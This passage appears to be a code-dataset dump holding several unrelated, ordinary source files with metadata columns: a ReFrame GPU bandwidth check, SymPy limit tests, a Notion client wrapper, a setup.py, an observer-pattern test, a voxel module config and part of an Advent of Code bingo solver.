}
self.tags = {'diagnostic', 'benchmark', 'mch',
'craype', 'external-resources'}
self.maintainers = ['AJ', 'SK']
def _xfer_pattern(self, xfer_kind, devno, nodename):
'''generates search pattern for performance analysis'''
if xfer_kind == 'h2d':
first_part = 'bandwidthTest-H2D-Pinned'
elif xfer_kind == 'd2h':
first_part = 'bandwidthTest-D2H-Pinned'
else:
first_part = 'bandwidthTest-D2D'
# Extract the bandwidth corresponding to the maximum buffer size
return (r'^%s[^,]*,\s*%s[^,]*,\s*Bandwidth\s*=\s*(\S+)\s*MB/s([^,]*,)'
r'{2}\s*Size\s*=\s*%d\s*bytes[^,]*,\s*DeviceNo\s*=\s*-1'
r':%s' % (nodename, first_part, self.max_buffer_size, devno))
@sn.sanity_function
def do_sanity_check(self):
failures = []
devices_found = set(sn.extractall(
r'^\s*([^,]*),\s*Detected devices: %s' % self.num_gpus_per_node,
self.stdout, 1
))
sn.evaluate(sn.assert_eq(
self.job.num_tasks, len(devices_found),
msg='requested {0} node(s), got {1} (nodelist: %s)' %
','.join(sorted(devices_found))))
good_nodes = set(sn.extractall(
r'^\s*([^,]*),\s*NID\s*=\s*\S+\s+Result = PASS',
self.stdout, 1
))
sn.evaluate(sn.assert_eq(
devices_found, good_nodes,
msg='check failed on the following node(s): %s' %
','.join(sorted(devices_found - good_nodes)))
)
# Sanity is fine, fill in the perf. patterns based on the exact node id
for nodename in devices_found:
for xfer_kind in ('h2d', 'd2h', 'd2d'):
for devno in range(self.num_gpus_per_node):
perfvar = '%s_gpu_%s_%s_bw' % (nodename, devno, xfer_kind)
perfvar = 'bw_%s_%s_gpu_%s' % (xfer_kind, nodename, devno)
self.perf_patterns[perfvar] = sn.extractsingle(
self._xfer_pattern(xfer_kind, devno, nodename),
self.stdout, 1, float, 0
)
partname = self.current_partition.fullname
refkey = '%s:%s' % (partname, perfvar)
bwkey = '%s:%s' % (partname, xfer_kind)
self.reference[refkey] = self.__bwref[bwkey]
return True
| # Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import os
import reframe.utility.sanity as sn
import reframe as rfm
@rfm.required_version('>=2.16-dev0')
@rfm.simple_test
class GpuBandwidthCheck(rfm.RegressionTest):
def __init__(self):
self.valid_systems = ['kesch:cn', 'daint:gpu', 'dom:gpu', 'tiger:gpu',
'arolla:cn', 'tsa:cn']
self.valid_prog_environs = ['PrgEnv-gnu']
if self.current_system.name in ['arolla', 'kesch', 'tsa']:
self.valid_prog_environs = ['PrgEnv-gnu-nompi']
self.exclusive_access = True
self.sourcesdir = os.path.join(
self.current_system.resourcesdir, 'CUDA', 'essentials'
)
self.build_system = 'SingleSource'
# Set nvcc flags
nvidia_sm = '60'
if self.current_system.name == 'kesch':
nvidia_sm = '37'
elif self.current_system.name in ['arolla', 'tsa']:
nvidia_sm = '70'
self.build_system.cxxflags = ['-I.', '-m64', '-arch=sm_%s' % nvidia_sm]
self.sourcepath = 'bandwidthtestflex.cu'
self.executable = 'gpu_bandwidth_check.x'
# Perform a single bandwidth test with a buffer size of 1024MB
self.min_buffer_size = 1073741824
self.max_buffer_size = 1073741824
self.executable_opts = ['device', 'all', '--mode=range',
'--start=%d' % self.min_buffer_size,
'--increment=%d' % self.min_buffer_size,
'--end=%d' % self.max_buffer_size, '--csv']
self.num_tasks = 0
self.num_tasks_per_node = 1
if self.current_system.name in ['daint', 'dom', 'tiger']:
self.modules = ['craype-accel-nvidia60']
self.num_gpus_per_node = 1
elif self.current_system.name == 'kesch':
self.modules = ['cudatoolkit/8.0.61']
self.num_gpus_per_node = 8
elif self.current_system.name in ['arolla', 'tsa']:
self.modules = ['cuda/10.1.243']
self.num_gpus_per_node = 8
# perf_patterns and reference will be set by the sanity check function
self.sanity_patterns = self.do_sanity_check()
self.perf_patterns = {}
self.reference = {}
self.__bwref = {
# FIXME: reference values for Arolla and Tsa need to be updated
# (sanity check fails if they are not defined)
'arolla:cn:h2d': (7583, -0.1, None, 'MB/s'),
'arolla:cn:d2h': (7584, -0.1, None, 'MB/s'),
'arolla:cn:d2d': (137408, -0.1, None, 'MB/s'),
'daint:gpu:h2d': (11881, -0.1, None, 'MB/s'),
'daint:gpu:d2h': (12571, -0.1, None, 'MB/s'),
'daint:gpu:d2d': (499000, -0.1, None, 'MB/s'),
'dom:gpu:h2d': (11881, -0.1, None, 'MB/s'),
'dom:gpu:d2h': (12571, -0.1, None, 'MB/s'),
'dom:gpu:d2d': (499000, -0.1, None, 'MB/s'),
'kesch:cn:h2d': (7583, -0.1, None, 'MB/s'),
'kesch:cn:d2h': (7584, -0.1, None, 'MB/s'),
'kesch:cn:d2d': (137408, -0.1, None, 'MB/s'),
'tiger:gpu:h2d': (0, None, None, 'MB/s'),
'tiger:gpu:d2h': (0, None, None, 'MB/s'),
'tiger:gpu:d2d': (0, None, None, 'MB/s'),
'tsa:cn:h2d': (7583, -0.1, None, 'MB/s'),
'tsa:cn:d2h': (7584, -0.1, None, 'MB/s'),
'tsa:cn:d2d': (137408, -0.1, None, 'MB/s'),
}
self.tags = {'diagnostic', 'benchmark', 'mch',
'craype', 'external-resources'}
self.maintainers = ['AJ', 'SK']
def _xfer_pattern(self, xfer_kind, devno, nodename):
'''generates search pattern for performance analysis'''
if xfer_kind == 'h2d':
first_part = 'bandwidthTest-H2D-Pinned'
elif xfer_kind == 'd2h':
first_part = 'bandwidthTest-D2H-Pinned'
else:
first_part = 'bandwidthTest-D2D'
# Extract the bandwidth corresponding to the maximum buffer size
return (r'^%s[^,]*,\s*%s[^,]*,\s*Bandwidth\s*=\s*(\S+)\s*MB/s([^,]*,)'
r'{2}\s*Size\s*=\s*%d\s*bytes[^,]*,\s*DeviceNo\s*=\s*-1'
r':%s' % (nodename, first_part, self.max_buffer_size, devno))
@sn.sanity_function
def do_sanity_check(self):
failures = []
devices_found = set(sn.extractall(
r'^\s*([^,]*),\s*Detected devices: %s' % self.num_gpus_per_node,
self.stdout, 1
))
sn.evaluate(sn.assert_eq(
self.job.num_tasks, len(devices_found),
msg='requested {0} node(s), got {1} (nodelist: %s)' %
','.join(sorted(devices_found))))
good_nodes = set(sn.extractall(
r'^\s*([^,]*),\s*NID\s*=\s*\S+\s+Result = PASS',
self.stdout, 1
))
sn.evaluate(sn.assert_eq(
devices_found, good_nodes,
msg='check failed on the following node(s): %s' %
','.join(sorted(devices_found - good_nodes)))
)
# Sanity is fine, fill in the perf. patterns based on the exact node id
for nodename in devices_found:
for xfer_kind in ('h2d', 'd2h', 'd2d'):
for devno in range(self.num_gpus_per_node):
perfvar = '%s_gpu_%s_%s_bw' % (nodename, devno, xfer_kind)
perfvar = 'bw_%s_%s_gpu_%s' % (xfer_kind, nodename, devno)
self.perf_patterns[perfvar] = sn.extractsingle(
self._xfer_pattern(xfer_kind, devno, nodename),
self.stdout, 1, float, 0
)
partname = self.current_partition.fullname
refkey = '%s:%s' % (partname, perfvar)
bwkey = '%s:%s' % (partname, xfer_kind)
self.reference[refkey] = self.__bwref[bwkey]
return True | en | 0.754266 | # Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich) # ReFrame Project Developers. See the top-level LICENSE file for details. # # SPDX-License-Identifier: BSD-3-Clause # Set nvcc flags # Perform a single bandwidth test with a buffer size of 1024MB # perf_patterns and reference will be set by the sanity check function # FIXME: reference values for Arolla and Tsa need to be updated # (sanity check fails if they are not defined) generates search pattern for performance analysis # Extract the bandwidth corresponding to the maximum buffer size # Sanity is fine, fill in the perf. patterns based on the exact node id | 1.801777 | 2 |
sympy/series/tests/test_demidovich.py | msgoff/sympy | 0 | 8569 | from sympy import (
limit,
Symbol,
oo,
sqrt,
Rational,
log,
exp,
cos,
sin,
tan,
pi,
asin,
together,
root,
S,
)
# Numbers listed with the tests refer to problem numbers in the book
# "Anti-demidovich, problemas resueltos, Ed. URSS"
x = Symbol("x")
def test_leadterm():
assert (3 + 2 * x ** (log(3) / log(2) - 1)).leadterm(x) == (3, 0)
def root3(x):
return root(x, 3)
def root4(x):
return root(x, 4)
def test_Limits_simple_0():
assert limit((2 ** (x + 1) + 3 ** (x + 1)) / (2 ** x + 3 ** x), x, oo) == 3 # 175
def test_Limits_simple_1():
assert limit((x + 1) * (x + 2) * (x + 3) / x ** 3, x, oo) == 1 # 172
assert limit(sqrt(x + 1) - sqrt(x), x, oo) == 0 # 179
assert (
limit((2 * x - 3) * (3 * x + 5) * (4 * x - 6) / (3 * x ** 3 + x - 1), x, oo)
== 8
) # Primjer 1
assert limit(x / root3(x ** 3 + 10), x, oo) == 1 # Primjer 2
assert limit((x + 1) ** 2 / (x ** 2 + 1), x, oo) == 1 # 181
def test_Limits_simple_2():
assert limit(1000 * x / (x ** 2 - 1), x, oo) == 0 # 182
assert limit((x ** 2 - 5 * x + 1) / (3 * x + 7), x, oo) is oo # 183
assert limit((2 * x ** 2 - x + 3) / (x ** 3 - 8 * x + 5), x, oo) == 0 # 184
assert limit((2 * x ** 2 - 3 * x - 4) / sqrt(x ** 4 + 1), x, oo) == 2 # 186
assert limit((2 * x + 3) / (x + root3(x)), x, oo) == 2 # 187
assert limit(x ** 2 / (10 + x * sqrt(x)), x, oo) is oo # 188
assert limit(root3(x ** 2 + 1) / (x + 1), x, oo) == 0 # 189
assert limit(sqrt(x) / sqrt(x + sqrt(x + sqrt(x))), x, oo) == 1 # 190
def test_Limits_simple_3a():
a = Symbol("a")
# issue 3513
assert together(limit((x ** 2 - (a + 1) * x + a) / (x ** 3 - a ** 3), x, a)) == (
a - 1
) / (
3 * a ** 2
) # 196
def test_Limits_simple_3b():
h = Symbol("h")
assert limit(((x + h) ** 3 - x ** 3) / h, h, 0) == 3 * x ** 2 # 197
assert limit((1 / (1 - x) - 3 / (1 - x ** 3)), x, 1) == -1 # 198
assert (
limit((sqrt(1 + x) - 1) / (root3(1 + x) - 1), x, 0) == Rational(3) / 2
) # Primer 4
assert limit((sqrt(x) - 1) / (x - 1), x, 1) == Rational(1) / 2 # 199
assert limit((sqrt(x) - 8) / (root3(x) - 4), x, 64) == 3 # 200
assert limit((root3(x) - 1) / (root4(x) - 1), x, 1) == Rational(4) / 3 # 201
assert (
limit((root3(x ** 2) - 2 * root3(x) + 1) / (x - 1) ** 2, x, 1)
== Rational(1) / 9
) # 202
def test_Limits_simple_4a():
a = Symbol("a")
assert limit((sqrt(x) - sqrt(a)) / (x - a), x, a) == 1 / (2 * sqrt(a)) # Primer 5
assert limit((sqrt(x) - 1) / (root3(x) - 1), x, 1) == Rational(3, 2) # 205
assert limit((sqrt(1 + x) - sqrt(1 - x)) / x, x, 0) == 1 # 207
assert limit(sqrt(x ** 2 - 5 * x + 6) - x, x, oo) == Rational(-5, 2) # 213
def test_limits_simple_4aa():
assert limit(x * (sqrt(x ** 2 + 1) - x), x, oo) == Rational(1) / 2 # 214
def test_Limits_simple_4b():
# issue 3511
assert limit(x - root3(x ** 3 - 1), x, oo) == 0 # 215
def test_Limits_simple_4c():
assert limit(log(1 + exp(x)) / x, x, -oo) == 0 # 267a
assert limit(log(1 + exp(x)) / x, x, oo) == 1 # 267b
def test_bounded():
assert limit(sin(x) / x, x, oo) == 0 # 216b
assert limit(x * sin(1 / x), x, 0) == 0 # 227a
def test_f1a():
# issue 3508:
assert limit((sin(2 * x) / x) ** (1 + x), x, 0) == 2 # Primer 7
def test_f1a2():
# issue 3509:
assert limit(((x - 1) / (x + 1)) ** x, x, oo) == exp(-2) # Primer 9
def test_f1b():
m = Symbol("m")
n = Symbol("n")
h = Symbol("h")
a = Symbol("a")
assert limit(sin(x) / x, x, 2) == sin(2) / 2 # 216a
assert limit(sin(3 * x) / x, x, 0) == 3 # 217
assert limit(sin(5 * x) / sin(2 * x), x, 0) == Rational(5, 2) # 218
assert limit(sin(pi * x) / sin(3 * pi * x), x, 0) == Rational(1, 3) # 219
assert limit(x * sin(pi / x), x, oo) == pi # 220
assert limit((1 - cos(x)) / x ** 2, x, 0) == S.Half # 221
assert limit(x * sin(1 / x), x, oo) == 1 # 227b
assert limit((cos(m * x) - cos(n * x)) / x ** 2, x, 0) == (
(n ** 2 - m ** 2) / 2
) # 232
assert limit((tan(x) - sin(x)) / x ** 3, x, 0) == S.Half # 233
assert limit((x - sin(2 * x)) / (x + sin(3 * x)), x, 0) == -Rational(1, 4) # 237
assert limit((1 - sqrt(cos(x))) / x ** 2, x, 0) == Rational(1, 4) # 239
assert limit((sqrt(1 + sin(x)) - sqrt(1 - sin(x))) / x, x, 0) == 1 # 240
assert limit((1 + h / x) ** x, x, oo) == exp(h) # Primer 9
assert limit((sin(x) - sin(a)) / (x - a), x, a) == cos(a) # 222, *176
assert limit((cos(x) - cos(a)) / (x - a), x, a) == -sin(a) # 223
assert limit((sin(x + h) - sin(x)) / h, h, 0) == cos(x) # 225
def test_f2a():
assert limit(((x + 1) / (2 * x + 1)) ** (x ** 2), x, oo) == 0 # Primer 8
def test_f2():
assert limit((sqrt(cos(x)) - root3(cos(x))) / (sin(x) ** 2), x, 0) == -Rational(
1, 12
) # *184
def test_f3():
a = Symbol("a")
# issue 3504
assert limit(asin(a * x) / x, x, 0) == a
| from sympy import (
limit,
Symbol,
oo,
sqrt,
Rational,
log,
exp,
cos,
sin,
tan,
pi,
asin,
together,
root,
S,
)
# Numbers listed with the tests refer to problem numbers in the book
# "Anti-demidovich, problemas resueltos, Ed. URSS"
x = Symbol("x")
def test_leadterm():
assert (3 + 2 * x ** (log(3) / log(2) - 1)).leadterm(x) == (3, 0)
def root3(x):
return root(x, 3)
def root4(x):
return root(x, 4)
def test_Limits_simple_0():
assert limit((2 ** (x + 1) + 3 ** (x + 1)) / (2 ** x + 3 ** x), x, oo) == 3 # 175
def test_Limits_simple_1():
assert limit((x + 1) * (x + 2) * (x + 3) / x ** 3, x, oo) == 1 # 172
assert limit(sqrt(x + 1) - sqrt(x), x, oo) == 0 # 179
assert (
limit((2 * x - 3) * (3 * x + 5) * (4 * x - 6) / (3 * x ** 3 + x - 1), x, oo)
== 8
) # Primjer 1
assert limit(x / root3(x ** 3 + 10), x, oo) == 1 # Primjer 2
assert limit((x + 1) ** 2 / (x ** 2 + 1), x, oo) == 1 # 181
def test_Limits_simple_2():
assert limit(1000 * x / (x ** 2 - 1), x, oo) == 0 # 182
assert limit((x ** 2 - 5 * x + 1) / (3 * x + 7), x, oo) is oo # 183
assert limit((2 * x ** 2 - x + 3) / (x ** 3 - 8 * x + 5), x, oo) == 0 # 184
assert limit((2 * x ** 2 - 3 * x - 4) / sqrt(x ** 4 + 1), x, oo) == 2 # 186
assert limit((2 * x + 3) / (x + root3(x)), x, oo) == 2 # 187
assert limit(x ** 2 / (10 + x * sqrt(x)), x, oo) is oo # 188
assert limit(root3(x ** 2 + 1) / (x + 1), x, oo) == 0 # 189
assert limit(sqrt(x) / sqrt(x + sqrt(x + sqrt(x))), x, oo) == 1 # 190
def test_Limits_simple_3a():
a = Symbol("a")
# issue 3513
assert together(limit((x ** 2 - (a + 1) * x + a) / (x ** 3 - a ** 3), x, a)) == (
a - 1
) / (
3 * a ** 2
) # 196
def test_Limits_simple_3b():
h = Symbol("h")
assert limit(((x + h) ** 3 - x ** 3) / h, h, 0) == 3 * x ** 2 # 197
assert limit((1 / (1 - x) - 3 / (1 - x ** 3)), x, 1) == -1 # 198
assert (
limit((sqrt(1 + x) - 1) / (root3(1 + x) - 1), x, 0) == Rational(3) / 2
) # Primer 4
assert limit((sqrt(x) - 1) / (x - 1), x, 1) == Rational(1) / 2 # 199
assert limit((sqrt(x) - 8) / (root3(x) - 4), x, 64) == 3 # 200
assert limit((root3(x) - 1) / (root4(x) - 1), x, 1) == Rational(4) / 3 # 201
assert (
limit((root3(x ** 2) - 2 * root3(x) + 1) / (x - 1) ** 2, x, 1)
== Rational(1) / 9
) # 202
def test_Limits_simple_4a():
a = Symbol("a")
assert limit((sqrt(x) - sqrt(a)) / (x - a), x, a) == 1 / (2 * sqrt(a)) # Primer 5
assert limit((sqrt(x) - 1) / (root3(x) - 1), x, 1) == Rational(3, 2) # 205
assert limit((sqrt(1 + x) - sqrt(1 - x)) / x, x, 0) == 1 # 207
assert limit(sqrt(x ** 2 - 5 * x + 6) - x, x, oo) == Rational(-5, 2) # 213
def test_limits_simple_4aa():
assert limit(x * (sqrt(x ** 2 + 1) - x), x, oo) == Rational(1) / 2 # 214
def test_Limits_simple_4b():
# issue 3511
assert limit(x - root3(x ** 3 - 1), x, oo) == 0 # 215
def test_Limits_simple_4c():
assert limit(log(1 + exp(x)) / x, x, -oo) == 0 # 267a
assert limit(log(1 + exp(x)) / x, x, oo) == 1 # 267b
def test_bounded():
assert limit(sin(x) / x, x, oo) == 0 # 216b
assert limit(x * sin(1 / x), x, 0) == 0 # 227a
def test_f1a():
# issue 3508:
assert limit((sin(2 * x) / x) ** (1 + x), x, 0) == 2 # Primer 7
def test_f1a2():
# issue 3509:
assert limit(((x - 1) / (x + 1)) ** x, x, oo) == exp(-2) # Primer 9
def test_f1b():
m = Symbol("m")
n = Symbol("n")
h = Symbol("h")
a = Symbol("a")
assert limit(sin(x) / x, x, 2) == sin(2) / 2 # 216a
assert limit(sin(3 * x) / x, x, 0) == 3 # 217
assert limit(sin(5 * x) / sin(2 * x), x, 0) == Rational(5, 2) # 218
assert limit(sin(pi * x) / sin(3 * pi * x), x, 0) == Rational(1, 3) # 219
assert limit(x * sin(pi / x), x, oo) == pi # 220
assert limit((1 - cos(x)) / x ** 2, x, 0) == S.Half # 221
assert limit(x * sin(1 / x), x, oo) == 1 # 227b
assert limit((cos(m * x) - cos(n * x)) / x ** 2, x, 0) == (
(n ** 2 - m ** 2) / 2
) # 232
assert limit((tan(x) - sin(x)) / x ** 3, x, 0) == S.Half # 233
assert limit((x - sin(2 * x)) / (x + sin(3 * x)), x, 0) == -Rational(1, 4) # 237
assert limit((1 - sqrt(cos(x))) / x ** 2, x, 0) == Rational(1, 4) # 239
assert limit((sqrt(1 + sin(x)) - sqrt(1 - sin(x))) / x, x, 0) == 1 # 240
assert limit((1 + h / x) ** x, x, oo) == exp(h) # Primer 9
assert limit((sin(x) - sin(a)) / (x - a), x, a) == cos(a) # 222, *176
assert limit((cos(x) - cos(a)) / (x - a), x, a) == -sin(a) # 223
assert limit((sin(x + h) - sin(x)) / h, h, 0) == cos(x) # 225
def test_f2a():
assert limit(((x + 1) / (2 * x + 1)) ** (x ** 2), x, oo) == 0 # Primer 8
def test_f2():
assert limit((sqrt(cos(x)) - root3(cos(x))) / (sin(x) ** 2), x, 0) == -Rational(
1, 12
) # *184
def test_f3():
a = Symbol("a")
# issue 3504
assert limit(asin(a * x) / x, x, 0) == a
| en | 0.379135 | # Numbers listed with the tests refer to problem numbers in the book # "Anti-demidovich, problemas resueltos, Ed. URSS" # 175 # 172 # 179 # Primjer 1 # Primjer 2 # 181 # 182 # 183 # 184 # 186 # 187 # 188 # 189 # 190 # issue 3513 # 196 # 197 # 198 # Primer 4 # 199 # 200 # 201 # 202 # Primer 5 # 205 # 207 # 213 # 214 # issue 3511 # 215 # 267a # 267b # 216b # 227a # issue 3508: # Primer 7 # issue 3509: # Primer 9 # 216a # 217 # 218 # 219 # 220 # 221 # 227b # 232 # 233 # 237 # 239 # 240 # Primer 9 # 222, *176 # 223 # 225 # Primer 8 # *184 # issue 3504 | 3.17227 | 3 |
notion/ctx.py | jfhbrook/notion-tools | 1 | 8570 | from notion.client import NotionClient
from notion.settings import Settings
class Context:
def __init__(self):
self.settings = Settings.from_file()
self._client = None
def get_client(self):
if not self._client:
self.settings.validate()
self._client = NotionClient(token_v2=self.settings.token, monitor=False)
return self._client
def update_settings(self, **kwargs):
self.settings = self.settings.update(**kwargs)
| from notion.client import NotionClient
from notion.settings import Settings
class Context:
def __init__(self):
self.settings = Settings.from_file()
self._client = None
def get_client(self):
if not self._client:
self.settings.validate()
self._client = NotionClient(token_v2=self.settings.token, monitor=False)
return self._client
def update_settings(self, **kwargs):
self.settings = self.settings.update(**kwargs)
| none | 1 | 2.172992 | 2 |
|
setup.py | rgooler/bootstrap-pip | 0 | 8571 | <filename>setup.py
#!/usr/bin/env python
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
install_requires = []
# install_requires = ['requests >= 2.1.0']
# For SNI support in Python 2, must install the following packages
# if sys.version_info[0] == 2:
# install_requires.append('pyOpenSSL >= 0.14')
# install_requires.append('ndg-httpsclient >= 0.3.3')
# install_requires.append('pyasn1 >= 0.1.7')
setup(
name='mymodule',
packages=['mymodule'],
version='0.1',
description='Desc',
long_description=(read('README.rst') + '\n\n' +
read('HISTORY.rst') + '\n\n' +
read('AUTHORS.rst')),
url='http://github.com/rgooler/bootstrap-pip/',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
py_modules=['mymodule'],
install_requires=install_requires,
include_package_data=True,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| <filename>setup.py
#!/usr/bin/env python
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
install_requires = []
# install_requires = ['requests >= 2.1.0']
# For SNI support in Python 2, must install the following packages
# if sys.version_info[0] == 2:
# install_requires.append('pyOpenSSL >= 0.14')
# install_requires.append('ndg-httpsclient >= 0.3.3')
# install_requires.append('pyasn1 >= 0.1.7')
setup(
name='mymodule',
packages=['mymodule'],
version='0.1',
description='Desc',
long_description=(read('README.rst') + '\n\n' +
read('HISTORY.rst') + '\n\n' +
read('AUTHORS.rst')),
url='http://github.com/rgooler/bootstrap-pip/',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
py_modules=['mymodule'],
install_requires=install_requires,
include_package_data=True,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| en | 0.497599 | #!/usr/bin/env python Build a file path from *paths* and return the contents. # install_requires = ['requests >= 2.1.0'] # For SNI support in Python 2, must install the following packages # if sys.version_info[0] == 2: # install_requires.append('pyOpenSSL >= 0.14') # install_requires.append('ndg-httpsclient >= 0.3.3') # install_requires.append('pyasn1 >= 0.1.7') | 2.126928 | 2 |
cfdata/tabular/converters/__init__.py | carefree0910/carefree-data | 9 | 8572 | from .base import *
from .string import *
from .categorical import *
from .numerical import *
__all__ = ["Converter", "converter_dict"]
| from .base import *
from .string import *
from .categorical import *
from .numerical import *
__all__ = ["Converter", "converter_dict"]
| none | 1 | 1.075889 | 1 |
|
hello_world.py | BronWang/first_github | 0 | 8573 | def hello_world():
"""打印Hello world"""
message = 'hello world'
print(message.title())
hello_world()
| def hello_world():
"""打印Hello world"""
message = 'hello world'
print(message.title())
hello_world()
| zh | 0.20271 | 打印Hello world | 2.750768 | 3 |
Python/Samples/Observer/UtObserver.py | plasroom46/DesignPattern.Sample | 9 | 8574 | import unittest
from Observers import Observer, ObserverMailServer, ObserverPbx
from Subjects import Subject, SubjectEflow
class UtVisitor(unittest.TestCase):
def test_observer(self):
# Create observers
pbx = ObserverPbx()
ms = ObserverMailServer()
# Create subject
subject = SubjectEflow()
subject.attach(pbx)
subject.attach(ms)
# Notify when JB is leave of absence
subject.notify("JB", "Hachi")
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| import unittest
from Observers import Observer, ObserverMailServer, ObserverPbx
from Subjects import Subject, SubjectEflow
class UtVisitor(unittest.TestCase):
def test_observer(self):
# Create observers
pbx = ObserverPbx()
ms = ObserverMailServer()
# Create subject
subject = SubjectEflow()
subject.attach(pbx)
subject.attach(ms)
# Notify when JB is leave of absence
subject.notify("JB", "Hachi")
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| en | 0.831654 | # Create observers # Create subject # Notify when JB is leave of absence | 3.040535 | 3 |
modules/voxelman/config.py | Relintai/pandemonium_engine | 0 | 8575 |
def can_build(env, platform):
return True
def configure(env):
pass
def get_doc_classes():
return [
"WorldArea",
"VoxelLight",
"VoxelLightNode",
"VoxelLevelGenerator",
"VoxelLevelGeneratorFlat",
"VoxelSurfaceMerger",
"VoxelSurfaceSimple",
"VoxelSurface",
"VoxelLibraryMerger",
"VoxelLibrarySimple",
"VoxelLibrary",
"VoxelLibraryMergerPCM",
"VoxelMaterialCache",
"VoxelMaterialCachePCM",
"VoxelCubePoints",
"VoxelMesherCubic",
"VoxelMeshData",
"MarchingCubesCellData",
"VoxelMesherMarchingCubes",
"VoxelMesher",
"EnvironmentData",
"VoxelChunk",
"VoxelChunkDefault",
"VoxelStructure",
"BlockVoxelStructure",
"VoxelWorld",
"VoxelMesherBlocky",
"VoxelWorldBlocky",
"VoxelChunkBlocky",
"VoxelMesherLiquidBlocky",
"VoxelWorldMarchingCubes",
"VoxelChunkMarchingCubes",
"VoxelMesherCubic",
"VoxelWorldCubic",
"VoxelChunkCubic",
"VoxelMesherDefault",
"VoxelWorldDefault",
"VoxelJob",
"VoxelTerrainJob",
"VoxelLightJob",
"VoxelPropJob",
"VoxelMesherJobStep",
]
def get_doc_path():
return "doc_classes"
|
def can_build(env, platform):
return True
def configure(env):
pass
def get_doc_classes():
return [
"WorldArea",
"VoxelLight",
"VoxelLightNode",
"VoxelLevelGenerator",
"VoxelLevelGeneratorFlat",
"VoxelSurfaceMerger",
"VoxelSurfaceSimple",
"VoxelSurface",
"VoxelLibraryMerger",
"VoxelLibrarySimple",
"VoxelLibrary",
"VoxelLibraryMergerPCM",
"VoxelMaterialCache",
"VoxelMaterialCachePCM",
"VoxelCubePoints",
"VoxelMesherCubic",
"VoxelMeshData",
"MarchingCubesCellData",
"VoxelMesherMarchingCubes",
"VoxelMesher",
"EnvironmentData",
"VoxelChunk",
"VoxelChunkDefault",
"VoxelStructure",
"BlockVoxelStructure",
"VoxelWorld",
"VoxelMesherBlocky",
"VoxelWorldBlocky",
"VoxelChunkBlocky",
"VoxelMesherLiquidBlocky",
"VoxelWorldMarchingCubes",
"VoxelChunkMarchingCubes",
"VoxelMesherCubic",
"VoxelWorldCubic",
"VoxelChunkCubic",
"VoxelMesherDefault",
"VoxelWorldDefault",
"VoxelJob",
"VoxelTerrainJob",
"VoxelLightJob",
"VoxelPropJob",
"VoxelMesherJobStep",
]
def get_doc_path():
return "doc_classes"
| none | 1 | 1.747734 | 2 |
|
Python/2021/day_04/day_04.py | JonoRicci/Advent-Of-Code | 0 | 8576 | <gh_stars>0
"""
Day 04
"""
from logger import logger
def main() -> None:
"""
Import the puzzle input, process and display the results.
"""
puzzle_input = import_list()
logger.debug(puzzle_input)
final_score = play_bingo(puzzle_input)
for result in final_score:
logger.info(f"The final score is: {result}.")
def import_list() -> list:
"""
Import the puzzle input and return a list.
:return: Puzzle input text file as list
:rtype: list
"""
file = open("puzzle-input", "r")
string_list = file.read().splitlines()
file.close()
return string_list
def play_bingo(bingo_cards: list) -> list:
"""
Extract winning numbers, bingo boards from input.
Make a separate 2D list tracking wins.
For each winning number, check every board row and column for a match.
Add matches to the 2D list tracking wins.
Once done, check 2D list for winning columns / rows.
Add winning boards to new list along with winning number.
Multiply to get score.
:param bingo_cards: puzzle input where each line is a string
:return: First and last winning board score
:rtype: list
"""
winning_numbers = [int(x) for x in bingo_cards[0].split(",")]
logger.debug(f" Winning numbers: {winning_numbers}")
single_board = []
all_boards = []
final_score_list = []
# Get Bingo Boards
for line in range(len(bingo_cards)):
if "," not in bingo_cards[line]:
row = [int(x) for x in bingo_cards[line].split()]
if row:
logger.debug(row)
single_board.append(row)
elif single_board:
all_boards.append(single_board)
single_board = []
# Set up separate 2D list tracking matches to winning numbers.
unmarked_tracker = []
for board in all_boards:
assert len(board) == 5 and len(board[0]) == 5
unmarked_tracker.append([[False for _ in range(5)] for _ in range(5)])
# Set up list to track winning boards.
winning_board = [False for _ in range(len(all_boards))]
for number in winning_numbers:
for index, board in enumerate(all_boards):
logger.debug(f"Checking board: {index} for {number}")
# Check for winning numbers.
for row in range(5):
for column in range(5):
if board[row][column] == number:
logger.debug(f"{unmarked_tracker[index][row][column]} "
f"is True.")
unmarked_tracker[index][row][column] = True
# Check for 5 in a row.
won = False
for row in range(5):
ok = True
for column in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for 5 in a column.
for column in range(5):
ok = True
for row in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for each winning board.
if won and not winning_board[index]:
winning_board[index] = True
winning_boards_count = len([j for j in range(len(all_boards))
if winning_board[j]])
# If first or last board.
if winning_boards_count == 1 or winning_boards_count == \
len(all_boards):
# Calculate all unmarked.
unmarked = 0
for row in range(5):
for column in range(5):
if not unmarked_tracker[index][row][column]:
unmarked += board[row][column]
final_score_list.append(unmarked * number)
logger.debug(f"The final score is: {final_score_list[-1]}, "
f"which is {unmarked} * {number}.")
return final_score_list
if __name__ == "__main__":
main()
| """
Day 04
"""
from logger import logger
def main() -> None:
"""
Import the puzzle input, process and display the results.
"""
puzzle_input = import_list()
logger.debug(puzzle_input)
final_score = play_bingo(puzzle_input)
for result in final_score:
logger.info(f"The final score is: {result}.")
def import_list() -> list:
"""
Import the puzzle input and return a list.
